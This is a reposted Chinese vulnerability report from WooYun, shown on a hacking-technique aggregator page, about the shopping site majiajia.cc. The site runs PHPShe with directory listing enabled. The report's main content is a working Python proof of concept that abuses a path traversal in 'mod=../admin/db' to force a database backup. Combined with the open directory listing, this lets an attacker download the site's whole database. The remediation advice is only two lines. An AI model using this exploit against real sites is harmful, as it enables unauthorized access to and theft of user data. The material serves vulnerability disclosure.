记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

马佳佳存在安全隐患可导致脱裤包括记录等

2014-06-10 18:55

首先存在 显示目录列表的问题 可以遍历网站结构

网站系统用的是phpshe 这个在乌云搜了下 可以看到漏洞一大把

而且厂商貌似不是太负责啊

然后根据上面的说名 把 数据库给备份下来了

然后 加上上面的 ‘显示目录列表’问题 就能看到真实的数据备份文件地址

漏洞证明:

import urllib2

import urllib



url='http://www.majiajia.cc/index.php?mod=../admin/db'



def post(url, data):

req = urllib2.Request(url)

data = urllib.urlencode(data)

#enable cookie

opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())

response = opener.open(req, data)

return response.read()





data = {'pebackup':'1','backup_where' : "server"}

print post(url, data)





运行上面命令即可备份数据



majiajia.jpg

修复方案:

修改网站配置

另外升级下网站程序吧

知识来源: www.wooyun.org/bugs/wooyun-2014-058207

阅读:61845 | 评论:1 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“马佳佳存在安全隐患可导致脱裤包括记录等”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云